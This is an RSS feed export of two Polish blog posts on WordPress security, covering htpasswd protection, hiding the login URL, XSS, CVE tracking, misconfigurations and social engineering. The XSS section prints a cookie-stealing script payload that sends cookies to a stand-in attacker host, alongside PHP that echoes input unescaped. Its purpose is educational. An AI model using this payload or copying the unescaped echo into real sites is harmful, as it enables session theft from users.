<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Strona www | Kobieta Koduje</title>
	<atom:link href="https://sklep.kobietakoduje.pl/category/kobietakoduje/strona-www/feed/" rel="self" type="application/rss+xml" />
	<link>https://sklep.kobietakoduje.pl</link>
	<description>Strony www i sklepy internetowe &#124; Marketing internetowy &#124; Reklama tradycyjna</description>
	<lastBuildDate>Thu, 26 May 2022 14:46:33 +0000</lastBuildDate>
	<language>pl-PL</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.2</generator>

<image>
	<url>https://sklep.kobietakoduje.pl/wp-content/uploads/logo-kobietakoduje.svg</url>
	<title>Strona www | Kobieta Koduje</title>
	<link>https://sklep.kobietakoduje.pl</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Bezpieczeństwo w wordpress cz. II</title>
		<link>https://sklep.kobietakoduje.pl/bezpieczenstwo-w-wordpress-cz-ii/</link>
					<comments>https://sklep.kobietakoduje.pl/bezpieczenstwo-w-wordpress-cz-ii/#respond</comments>
		
		<dc:creator><![CDATA[kobieta koduje]]></dc:creator>
		<pubDate>Wed, 02 Mar 2022 17:04:57 +0000</pubDate>
				<category><![CDATA[IT]]></category>
		<category><![CDATA[Strona www]]></category>
		<category><![CDATA[Woocommerce]]></category>
		<category><![CDATA[Wordpress www]]></category>
		<guid isPermaLink="false">https://kobietakoduje.pl/?p=3255</guid>

					<description><![CDATA[<p>WordPress nie należy do aplikacji o największym poziomie bezpieczeństwa, i wynika to z kilku historycznych powodów: Miał być narzędziem do prowadzenia blogów czy też stron wizytówkowych, a nie sklepem internetowym czy czymkolwiek innym co zawierałoby wrażliwe dane o użytkownikach. Powstał w 2003 roku, a 20 lat w branży IT to jak epoka dla innych dziedzin [&#8230;]</p>
<p></p>]]></description>
										<content:encoded><![CDATA[<div data-elementor-type="wp-post" data-elementor-id="3255" class="elementor elementor-3255" data-elementor-post-type="post">
						<section class="elementor-section elementor-top-section elementor-element elementor-element-ddcc5cd elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="ddcc5cd" data-element_type="section" data-e-type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ab2b2fa" data-id="ab2b2fa" data-element_type="column" data-e-type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-ecbbf59 elementor-widget elementor-widget-text-editor" data-id="ecbbf59" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>WordPress nie należy do aplikacji o największym poziomie bezpieczeństwa, i wynika to z kilku historycznych powodów:</p><p>Miał być narzędziem do prowadzenia blogów czy też stron wizytówkowych, a nie sklepem internetowym czy czymkolwiek innym co zawierałoby wrażliwe dane o użytkownikach.<br />Powstał w 2003 roku, a 20 lat w branży IT to jak epoka dla innych dziedzin biznesowych. Internet przeszedł ewolucję w kwestii cyberbezpieczeństwa, i tak jak kiedyś był to jeden wielki znak zapytania, tak teraz zwraca się na to dużo większą (choć nadal niewystarczającą) uwagę.<br />Posiada rozproszony autorytet, lub jak kto woli &#8211; powstał jako open source. Umożliwia nam to rozszerzenie naszej aplikacji o kod zarówno programistów tworzących oprogramowanie komercyjne w sposób w pełni profesjonalny, jak i tych, którzy dopiero się tego uczą.</p><p>Przejdźmy przez najpopularniejsze metody ochrony przed poszczególnymi atakami:</p><p>Będziemy starać się unikać instalacji dodatkowych wtyczek z racji, że są one potencjalnie możliwymi wektorami ataku.</p>								</div>
				</div>
				<div class="elementor-element elementor-element-ac5d50c elementor-widget elementor-widget-heading" data-id="ac5d50c" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Bruteforce</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-e1937ea elementor-widget elementor-widget-text-editor" data-id="e1937ea" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Atak typu bruteforce czyli atak słownikowy polegający na odgadywania haseł “losowo”. Jest to najprymitywniejsza forma ataku jakiej może dopuścić się złośliwy użytkownik i jednoczesnie jedna z łatwiejszych do ochrony bo wystarczy… ustawić ponadprzeciętne hasło.</p><p>Ma to na celu uczynić próby atakującego nieopłacalnymi w czasie, lecz jeśli jesteś trochę bardziej świadomym programistą to możesz zauważyć pewien problem &#8211; ataki typu bruteforce są z natury podobne do ataków typu DDoS, gdyż niezamierzonym efektem ubocznym jest wygenerowanie bardzo dużego ruchu na stronie co skutkuje zaburzeniem pracy serwera.</p><p>Ale jak to?</p><p>Każdy użytkownik odwiedzający strony WordPressowe niezależnie od tego czy odwiedza stronę ze zdjęciami, swój koszyk, formularz kontaktowy lub dowolny inny adres na naszej stronie “rezewuje” sobie kilkanaście / kilkadziesiąt megabajtów pamięci (w zależności od konfiguracji, ilośći wtyczek, itp.), jakiś procent zużycia procesora, i coś tam przepustowości sieci, w skrócie &#8211; zabiera nam zasoby.</p><p>Kiedy jeden użytkownik próbuje 100 razy odgadnąć hasło to problem nie nastaje bo robi to synchronicznie (jedna próba za drugą), natomiast w przypadku tego typu ataków możemy spodziewać się symulacji wydarzeń w których serwer otrzymuje żądania od kilkudziesięciu użytkowników jednocześnie co często kończy się spadkiem wydajności strony, albo nawet jej crashem.</p><p>Przed klasycznym atakiem DDoS powinien ochronić nas w przypadku serwerów współdzielonych nasz dostawca hostingowy, gdyż ma całkowitą kontrolę nad infrastrukturą, natomiast przed próbą włamania się do panelu administracyjnego musimy już radzić sobie sami.</p><p><strong>Metod jest kilka:</strong><br /><strong>Ustawienie hasła dla adresu /wp-admin za pomocą htpasswd</strong></p><p>Aplikacja htpasswd pozwala nam wygenerować plik zawierający nazwę użytkownika, oraz hash hasła służącego do autoryzacji pod danym adresem URL. Oznacza to, że zanim dostaniemy możliwość wpisania danych do naszej strony ujrzymy następujący popup na stronie:</p>								</div>
				</div>
				<div class="elementor-element elementor-element-cefb8fc elementor-widget elementor-widget-image" data-id="cefb8fc" data-element_type="widget" data-e-type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img fetchpriority="high" decoding="async" width="446" height="234" src="https://sklep.kobietakoduje.pl/wp-content/uploads/zmiana-adresu-do-logowania-wp.png" class="attachment-large size-large wp-image-3256" alt="" srcset="https://sklep.kobietakoduje.pl/wp-content/uploads/zmiana-adresu-do-logowania-wp.png 446w, https://sklep.kobietakoduje.pl/wp-content/uploads/zmiana-adresu-do-logowania-wp-300x157.png 300w" sizes="(max-width: 446px) 100vw, 446px" />															</div>
				</div>
				<div class="elementor-element elementor-element-d956255 elementor-widget elementor-widget-text-editor" data-id="d956255" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>I co to zmienia? Użytkownik nadal może zgadywać hasło</p><p>Owszem, lecz w tym przypadku nie jest zaangażowany do tego silnik PHP a jedynie serwer Apache co krytycznie zmniejsza ilość pożeranych zasobów przez złośliwe boty odwiedzające naszą stronę. Często sposób w jaki są oskryptowane sprawia, że po otrzymaniu wymagania dodatkowego uwierzytelnienia porzucają dalsze próby włamania się na stronę.</p><p>No ok, więc jak to dodać na mojej stronie?</p><p>Zarówno na Linuxie jak i Windowsie aplikacja ma nazwę htpasswd i jest dostarczana wraz z serwerem Apache, lub oddzielnie w paczce xxx-utils (linux)</p><p>https://httpd.apache.org/docs/2.4/programs/htpasswd.html</p><p>Popularne ścieżka w systemie Windows to C:/Xampp/bin/htpasswd.exe</p><p>Wywołujemy ten program następująco:</p><p>htpasswd.exe -c -B C:\Projects\Wordpress\.htpasswd John</p><p>Zostaniemy poproszeni o dwukrotne wpisanie hasła, po czym zostanie utworzony w podanej ścieżce plik .htpasswd zawierający mniej więcej taką zawartość:</p><p>John:$apr1$a1iNsTt2$H.MDgnxQ6jafyHmK0R78i1</p><p>Gdzie po lewo jest nazwa użytkownika do logowania, a po prawo hash zapisany za pomocą algorytmu bcrypt (-B)</p><p>I co z tym plikiem?</p><p>Tak gotowy plik wrzucamy do głównego katalogu i instruujemy serwer Apache by chronił nim poszczególne adresy URL</p><p>Uwaga: jeżeli mamy taką możliwość to nie przechowujemy tego pliku w katalogu w którym znajduje się nasza strona www. Odpowiednio skonfigurowany serwer Apache powinien ten plik odczytywać z lokacji niedostępnej dla silnika PHP. Niestety w przypadku serwerów współdzielonych zazwyczaj dostajemy FTP i krzyż na drogę więc zostaje nam tylko takie rozwiązanie</p><p>No dobra dobra, co z tym instruowaniem Apacha?</p><p>Edytujemy treść pliku .htaccess by zawierał następującą treść na początku:</p><p>SetEnvIf Request_URI ^/wp-admin require_auth=true</p><p>AuthUserFile /var/www/html/.htpasswd<br />AuthName &#8222;Hello there&#8221;<br />AuthType Basic</p><p>Order Deny,Allow<br />Deny from all<br />Satisfy any<br />Require valid-user<br />Allow from env=!require_auth</p><p>order allow,deny<br />deny from all</p><p>Ta reguła mówi nam: “Jeśli adres URL zaczyna się od wp-admin, to wymuś autoryzację za pomocą pliku /var/www/html/.htpasswd”, oraz “Zabroń bezpośredniego dostępu do pliku .htaccess” tak by nie można było go podejrzeć manipulując adresem URL</p><p>Tutaj ścieżka do pliku .htpasswd będzie prawdopodobnie zupełnie inna dla środowisk w których posiadacie swoje strony. W przypadku, gdy nie zostało to zablokowane to z pomocą Filezilli można kliknąć na dowolnym katalogu i pobrać jego pełną ścieżkę na serwerze. Podanie ścieżki relatywnej odbywa się względem katalogu na którym jest serwer (nie strona), a na hostingu współdzielonym nie powinniśmy mieć do tej lokacji dostępu więc jesteśmy tu skazani na użycie ścieżki absolutnej, o której zmianie warto pamiętać przy migracji na inne serwery.</p><p><strong>Zmiana adresu /wp-admin na inny</strong></p><p>A co gdyby tak zmienić adres do logowania się zamiast zakładać na niego dodatkowe hasła, które musimy pamiętać? Da się, aczkolwiek jest to tzw. security by obscurity czyli bezpieczeństwo przez niejawność &#8211; szeroko krytykowane jako niewystarczające podejście do tematu cyberbezpieczeństwa. Niemniej warto to zrobić jako uzupełnienie do innych metod ochrony naszej strony.</p><p>Użyjemy w tym celu wtyczki WPS Hide Login</p><p>Jest ona o tyle prosta w konfiguracji, że wystarczy skonfigurować adres do logowania na inny ja poniżej na zdjęciu:</p>								</div>
				</div>
				<div class="elementor-element elementor-element-c86523c elementor-widget elementor-widget-image" data-id="c86523c" data-element_type="widget" data-e-type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img decoding="async" width="512" height="38" src="https://sklep.kobietakoduje.pl/wp-content/uploads/wps-hide-login-ukryj-url-logowania.png" class="attachment-large size-large wp-image-3257" alt="" srcset="https://sklep.kobietakoduje.pl/wp-content/uploads/wps-hide-login-ukryj-url-logowania.png 512w, https://sklep.kobietakoduje.pl/wp-content/uploads/wps-hide-login-ukryj-url-logowania-300x22.png 300w" sizes="(max-width: 512px) 100vw, 512px" />															</div>
				</div>
				<div class="elementor-element elementor-element-bcef7e8 elementor-widget elementor-widget-text-editor" data-id="bcef7e8" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Klikamy na Zapisz Zmiany i mamy nowy adres URL do logowania się


								</div>
				</div>
				<div class="elementor-element elementor-element-5489091 elementor-widget elementor-widget-heading" data-id="5489091" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">CROSS-SITE / XSS</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-2172ab3 elementor-widget elementor-widget-code-block-for-elementor" data-id="2172ab3" data-element_type="widget" data-e-type="widget" data-widget_type="code-block-for-elementor.default">
				<div class="elementor-widget-container">
					<pre class='theme-okaidia' data-show-toolbar='no'><code class='language-javascript'>&lt;pre&gt;
foo.baz?message=&lt;script&gt;fetch(&lsquo;moja-zla-strona.bu?ciasteczka=&#039; + document.cookies)&lt;/script&gt;
&lt;/pre&gt;</code></pre>				</div>
				</div>
				<div class="elementor-element elementor-element-81075e7 elementor-widget elementor-widget-text-editor" data-id="81075e7" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Gdyby można było jakoś zgeneralizować czym są ataki typu Cross Site, to prawdopodobnie można by je opisać jako wstrzyknięcie złośliwej treści na stronę.</p><p>Powiedzmy, że posiadamy własną domenę. Nie daje to nam w żaden sposób dostępu do ciasteczek użytkownika z domeny innej strony &#8211; ciasteczka są zawężone do domeny tak by każda strona wiedziała tylko o swoich ciasteczkach.</p><p>Jednak posiadanie własnej domeny pozwala nam podrzucić ofierze link, który stworzy nam pewien obszar ataku.</p><p>Powiedzmy, że strona którą chcemy zaatakować jest pod domeną foo.baz i zawiera kod w stylu:</p>								</div>
				</div>
				<div class="elementor-element elementor-element-acebb52 elementor-widget elementor-widget-code-block-for-elementor" data-id="acebb52" data-element_type="widget" data-e-type="widget" data-widget_type="code-block-for-elementor.default">
				<div class="elementor-widget-container">
					<pre class='theme-okaidia' data-show-toolbar='no'><code class='language-php'>&lt;?php
echo &ldquo;&lt;h1&gt;Sklep z bulbultorami&lt;/h1&gt;&rdquo;;
echo $_GET[&lsquo;message&rsquo;];
?&gt;


</code></pre>				</div>
				</div>
				<div class="elementor-element elementor-element-888bc16 elementor-widget elementor-widget-text-editor" data-id="888bc16" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Jeśli wejdziemy na taką stronę poprzez:
<pre>
foo.baz?message=Czesc
</pre>
to zobaczymy przyjazną naszym oczom wiadomość, natomiast jeśli użyjemy (uproszczony przykład dla czytelności):								</div>
				</div>
				<div class="elementor-element elementor-element-02aebf1 elementor-widget elementor-widget-code-block-for-elementor" data-id="02aebf1" data-element_type="widget" data-e-type="widget" data-widget_type="code-block-for-elementor.default">
				<div class="elementor-widget-container">
					<pre class='theme-okaidia' data-show-toolbar='no'><code class='language-php'>
foo.baz?message=&lt;script&gt;fetch(&lsquo;moja-zla-strona.bu?ciasteczka=&#039; + document.cookies)&lt;/script&gt;</code></pre>				</div>
				</div>
				<div class="elementor-element elementor-element-57be8ef elementor-widget elementor-widget-text-editor" data-id="57be8ef" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>to na serwer atakującego zostaną wysłane dane o naszych ciasteczkach.</p><p>Co prawda CMSy takie jak prestashop starają się zabezpieczać ciasteczka wiążąc je z adresem IP użytkownika, lecz w WordPressie tego brak. W ten czy inny sposób dane użytkownika należy chronić.</p><p>Ale ja nie wiem czy mój szablon ma takie wady</p><p>I tu z pomocą przychodzą nam strony zawierające informacje o tzw. CVE (Common Vulnerabilities and Exposures), czyli publicznych zgłoszeniach o lukach w bezpieczeństwie.</p><p>Popularne strony z CVE:</p><p><strong>https://cve.mitre.org/</strong><br /><strong>https://www.cvedetails.com/</strong><br /><strong>https://www.cve.org/</strong></p><p>Co prawda te strony nie pokazują dokładnie jak wykorzystać daną lukę, ale do większości tych informacji da się dojść bo wraz z publikacją CVE traci ona na wartości.</p><p>Dla przykładu możemy dość łatwo znaleźć informacje o ostatniej podatności w WordPressie we wtyczce UpdraftPlus:</p><p><strong>https://www.cvedetails.com/cve/CVE-2022-0633/</strong></p><p>lub</p><p><strong>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0633</strong></p><p>Z racji, że numery CVE są ujednolicone, to wszystkie strony powinny je zawierać a różnić się co najwyżej samym działaniem wyszukiwarki, lub innymi udogodnieniami. Gdybyśmy chcieli zainteresować się API odnośnie CVE to najbliżej było by nam do <strong>https://nvd.nist.gov/</strong> i projektów jak <strong>https://github.com/opencve/opencve</strong></p><p>Sugerujemy znaleźć dogodną dla nas metodę śledzenia nowych CVE i w miarę dostępności aktualizowanie wtyczek podatnych na ataki, lub ich wyłączenie na czas dopóki nie pojawi się aktualizacja.</p><p>W przypadku, gdy nie chcemy odwiedzać powyższych stron, lecz chcemy mieć mimo wszystko jakiś monitoring, np. z pomocą płatnej wersji <strong>https://pl.wordpress.org/plugins/better-wp-security/</strong> , aczkolwiek taki skaner nie jest zbyt skomplikowany do napisania samemu jeśli tylko wejdziemy w posiadanie dostępów do jednego z API CVE.</p><p>W tej kwestii to by było wszystko co można powiedzieć o wtyczkach, których sami nie piszemy a jedynie instalujemy. </p>								</div>
				</div>
				<div class="elementor-element elementor-element-c42a216 elementor-widget elementor-widget-heading" data-id="c42a216" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Zła konfiguracja</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-12c4230 numerowanie elementor-widget elementor-widget-text-editor" data-id="12c4230" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Z racji, że w założeniu korzystamy ze środowisk współdzielonych, gdzie dostawca winien jest dołożyć trochę starań o to by serwer WWW był poprawnie skonfigurowany pod względem bezpieczeństwa, zostanie tu stworzona lista lista najpopularniejszych błędów w konfiguracji aplikacji webowych

<ol>Złe uprawnienia do plików
<ul>
<li>Jeśli kiedyś rozwiązałeś/aś problem za pomocą nadania pełnych uprawnień każdemu do katalogu (chmod 777), to prawdopodobnie było to złe rozwiązanie</li>
<li>Zazwyczaj dla katalogów ustawia się 755, a dla plików 644, lecz nie jest to złota zasada i dla poszczególnych plików w WP i PS mogą być to inne uprawnienia.</li>
</ul>
</ol>
<ol>
Włączony tryb debugowania
<ul>
<li>Za każdym razem, gdy w naszym systemie wystąpi błąd to wyświetli się on na ekranie. Stety / niestety potrafi on pokazać więcej informacji niż jest to konieczne, w tym dane dostępowe</li>
</ul>
</ol>
<ol>Brak środowiska testowego
<ul>
<li>W miarę możliwości zawsze staramy się nowe zmiany testować na lokalnym środowisku</li>
</ul>
</ol>
<ol>
Backup
<ul>
<li>Backup powinien być przechowywany na serwerze zewnętrznym, a nie na tym samym co działająca aplikacja</li>
</ul>
</ol>
<ol>Korzystanie z wtyczek z zaszyfrowanym kodzie, np. z pomocą IonCube
<ul>
<li>Oddajemy w ten sposób praktycznie dostęp do naszego serwera autorowi wtyczki. Nie znając kodu jaki jest uruchamiany popełniamy zbrodnię na cyberbezpieczeństwie</li>
</ul>
</ol>
								</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				</div><p></p>]]></content:encoded>
					
					<wfw:commentRss>https://sklep.kobietakoduje.pl/bezpieczenstwo-w-wordpress-cz-ii/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Bezpieczeństwo w wordpress cz. I</title>
		<link>https://sklep.kobietakoduje.pl/bezpieczenstwo-w-wordpress-cz-i/</link>
					<comments>https://sklep.kobietakoduje.pl/bezpieczenstwo-w-wordpress-cz-i/#respond</comments>
		
		<dc:creator><![CDATA[kobieta koduje]]></dc:creator>
		<pubDate>Wed, 02 Mar 2022 16:55:21 +0000</pubDate>
				<category><![CDATA[IT]]></category>
		<category><![CDATA[Strona www]]></category>
		<category><![CDATA[Woocommerce]]></category>
		<category><![CDATA[Wordpress www]]></category>
		<guid isPermaLink="false">https://kobietakoduje.pl/?p=3247</guid>

					<description><![CDATA[<p>Bezpieczeństwo ogółem Z racji, że temat cyberbezpieczeństwa jest dość rozległym zagadnieniem, to zanim przejdziemy do miejsca w którym znajduje się tu WordPress należy przedstawić nieco szerszy obraz rzeczywistości w jakiej się znajdujemy, w jakim środowisku pracujemy, i co możemy z nim zrobić by zwiększyć bezpieczeństwo naszej strony. Wyróżniamy co najmniej cztery najpopularniejsze środowiska na jakich [&#8230;]</p>
<p></p>]]></description>
										<content:encoded><![CDATA[<div data-elementor-type="wp-post" data-elementor-id="3247" class="elementor elementor-3247" data-elementor-post-type="post">
						<section class="elementor-section elementor-top-section elementor-element elementor-element-4941084 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="4941084" data-element_type="section" data-e-type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-baf2430" data-id="baf2430" data-element_type="column" data-e-type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-142d551 elementor-widget elementor-widget-heading" data-id="142d551" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Bezpieczeństwo ogółem</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-dc8359f elementor-widget elementor-widget-text-editor" data-id="dc8359f" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Z racji, że temat cyberbezpieczeństwa jest dość rozległym zagadnieniem, to zanim przejdziemy do miejsca w którym znajduje się tu WordPress należy przedstawić nieco szerszy obraz rzeczywistości w jakiej się znajdujemy, w jakim środowisku pracujemy, i co możemy z nim zrobić by zwiększyć bezpieczeństwo naszej strony.</p><p>Wyróżniamy co najmniej cztery najpopularniejsze środowiska na jakich możemy znaleźć strony internetowe:</p><ul><li>Serwer VPS &#8211; środowisko do którego mamy zazwyczaj dostęp na poziomie superużytkownika, będące najbardziej opłacalne uwzględniając kwestię cena / jakość. Wymaga ono jednak podstawowej wiedzy z zakresu administracji serwerami na poziomie konsoli by móc je w pełni wykorzystać. Plusem środowisk VPS jest uproszczone zarządzanie kopiami zapasowymi dzięki często oferowanym (dodatkowo płatnym) automatycznym kopiom zapasowym.</li><li>Serwer dedykowany &#8211; kolokwialnie “VPS na sterydach” za odpowiednio wyższą cenę. W odróżnieniu od serwerów VPS jesteśmy w pełni odpowiedzialni za organizację kopii zapasowych. Zyskujemy największą wydajność kosztem obciążenia nas zorganizowaniem częściowych zabezpieczeń infrastruktury</li><li>Serwer współdzielony &#8211; serwer którego zasoby są współdzielone z innymi użytkownikami. Zazwyczaj oferują możliwość instalacji aplikacji z poziomu panelu administracyjnego metodami “1-click” i otrzymaniu dostępu FTP. Tu podobnie jak w funkcjach VPS możemy liczyć na kopie zapasowe jako element wliczony w cenę. Wybierając tę opcję bezpieczeństwo infrastruktury (nie aplikacji) zrzucamy praktycznie na dostawcę usługi.</li><li>Chmura &#8211; najczęściej skonteneryzowana sieć serwerów zarówno dedykowanych jak i VPSów. W tym rozproszonym środowisku publiczne CMSy praktycznie nie występują, lub ich obecność tam jest drogą pod górę ponieważ aplikacje w środowiskach chmurowych powinny być odpowiednio zaprojektowane u podstaw czego WordPress z racji powstania zanim chmury zostały spopularyzowane nie spełnia.</li></ul><p>W przypadku, gdy nie mamy doświadczenia w konfiguracji środowisk “od zera” jako superużytkownik, to zostaje nam efektywnie wybór środowisk współdzielonych. Praktycznie każda firma hostingowa ma w swojej ofercie takie środowiska i są one w skali roku najtańszym rozwiązaniem spośród wszystkich wyżej wymienionych.</p>								</div>
				</div>
				<div class="elementor-element elementor-element-bef8565 elementor-widget elementor-widget-heading" data-id="bef8565" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Ważne</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-1976925 elementor-widget elementor-widget-text-editor" data-id="1976925" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Dalsza część artykułu wymaga ode mnie jako autora zawarcia informacji, że treści tu zawarte mają charakter czysto edukacyjny i nie mogą stanowić dla czytelnika źródła wiedzy służącej łamaniu prawa, lub działania na cudzą niekorzyść.</p><p>Testując cudzą własność pod kątem cyberbezpieczeństwa musimy uzyskać od tej osoby zgodę na wykonanie tych czynności, w przeciwnym razie następuje łamanie prawa.</p><p>Mając tę kwestię za nami, można przejść do kolejnej części.</p>								</div>
				</div>
				<div class="elementor-element elementor-element-ab7ec6d elementor-widget elementor-widget-heading" data-id="ab7ec6d" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Wektor ataktu</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-ff1a0c4 elementor-widget elementor-widget-text-editor" data-id="ff1a0c4" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Popularny buzzword w IT służący do określenia metodyki jaką atakujący stronę użytkownik zamierza zastosować. Na potrzeby wizualizacji popularnych wektorów ataku przygotowałem poniższą ilustrację
:								</div>
				</div>
				<div class="elementor-element elementor-element-6d83ae2 elementor-widget elementor-widget-image" data-id="6d83ae2" data-element_type="widget" data-e-type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img decoding="async" width="456" height="512" src="https://sklep.kobietakoduje.pl/wp-content/uploads/wektor-ataku.png" class="attachment-large size-large wp-image-3249" alt="" srcset="https://sklep.kobietakoduje.pl/wp-content/uploads/wektor-ataku.png 456w, https://sklep.kobietakoduje.pl/wp-content/uploads/wektor-ataku-267x300.png 267w" sizes="(max-width: 456px) 100vw, 456px" />															</div>
				</div>
				<div class="elementor-element elementor-element-08c85ec elementor-widget elementor-widget-text-editor" data-id="08c85ec" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Niektóre z tych słów mówią same za siebie, inne mogą wymagać pewnych wyjaśnień, więc spróbujemy zawęzić je do tych, które są dla nas najbardziej ryzykowne na środowiskach współdzielonych.

Dla uproszczenia zamieszczam tę ilustrację ponownie zostawiając to na czym powinniśmy się skupić najbardziej, czyli:
								</div>
				</div>
				<div class="elementor-element elementor-element-294e182 elementor-widget elementor-widget-image" data-id="294e182" data-element_type="widget" data-e-type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img loading="lazy" decoding="async" width="512" height="509" src="https://sklep.kobietakoduje.pl/wp-content/uploads/wektor-ataku-hakerskiego.png" class="attachment-large size-large wp-image-3250" alt="" srcset="https://sklep.kobietakoduje.pl/wp-content/uploads/wektor-ataku-hakerskiego.png 512w, https://sklep.kobietakoduje.pl/wp-content/uploads/wektor-ataku-hakerskiego-100x100.png 100w, https://sklep.kobietakoduje.pl/wp-content/uploads/wektor-ataku-hakerskiego-300x298.png 300w, https://sklep.kobietakoduje.pl/wp-content/uploads/wektor-ataku-hakerskiego-150x150.png 150w" sizes="(max-width: 512px) 100vw, 512px" />															</div>
				</div>
				<div class="elementor-element elementor-element-c0be2e4 elementor-widget elementor-widget-text-editor" data-id="c0be2e4" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Tak więc zacznijmy od czegoś, co w dzisiejszych czasach jest najbardziej popularnym powodem włamań &#8211; człowiek.								</div>
				</div>
				<div class="elementor-element elementor-element-7a42573 elementor-widget elementor-widget-heading" data-id="7a42573" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Człowiek</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-7b82b2f elementor-widget elementor-widget-text-editor" data-id="7b82b2f" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>I to nie ten, który dokonuje samego włamania &#8211; pomylimy przyczynę ze skutkiem. W ramach powiedzenia “lepiej zapobiegać niż leczyć” warto jest przeszkolić osoby mające dostęp administracyjny w taki sposób by były one wyczulone na najpopularniejsze techniki manipulacji w sieci.</p><p>Za psychologa się nie uważam, natomiast za kogoś kto dostał dziesiątki maili tego rodzaju już chyba mogę. Jako przykład jednej z ciekawszych prób oszustwa mogłabym przytoczyć historię w której dostałam email informujący mnie o tym, że pewna domena X.pl w której jestem posiadaniu naraża mnie na nieprzyjemności karne związane z tym, że koncern nadawcy zastrzegł sobie prawa do tej nazwy przed tym jak zarejestrowałem daną domenę. Niewiele myśląc odpisałam coś w stylu “no i?” wiedząc, że to za mało by móc wygrać sprawę w sądzie. W odpowiedzi uzyskałem coś bardziej ciekawego bo propozycję wykupienia nazwy pod innymi domenami (eu, dev, biz, etc.) za grosze, co właściwie mogłabym zrobić i bez ich namowy (to dobra praktyka), gdyby to nie była moja strona o niskiej dla mnie wadze. Uświadomiłam sobie, że to nie jest już rozmowa z botem, tylko przydzielono do mnie kogoś kto miał ten angielski na poziomie komunikatywnym. Jak się później okazało po drobnym researchu linki jakie zostały mi podesłane kierowały na serwery w Chinach, a że Chiny są skrajnie na bakier z poszanowaniem praw od razu przestałam sobie zawracać głowę tematem. Uzupełniłam tylko w miarę możliwości swój research i okazało się, że firma rzekomo oferująca te domeny miała skrajnie niesymetryczne umowy obciążają klientów dużymi kwotami.</p><p>Jestem skłonna uwierzyć, że dużo osób dało by się przekonać do zakupu większej ilości domen dla zabezpieczenia ich interesu.</p><p>Przykładów tego typu podejść można znaleźć mnóstwo, natomiast to co się powtarza w nich regularnie to:</p><p>-wywołanie u ofiary wrażenia, że sytuacja jest poważna<br />-zbudowanie atmosfery w której wierzymy, że osoba z którą piszemy jest po naszej stronie i stara się nam pomóc, lub też znaleźć kompromis<br />-jeśli możliwe &#8211; wywołanie presji czasu, lub stworzenie odpowiedniego momentu, np.<br />przed godziną 17stą gdy ludzie chcą szybko skończyć prace bo są zmęczeni &#8211; 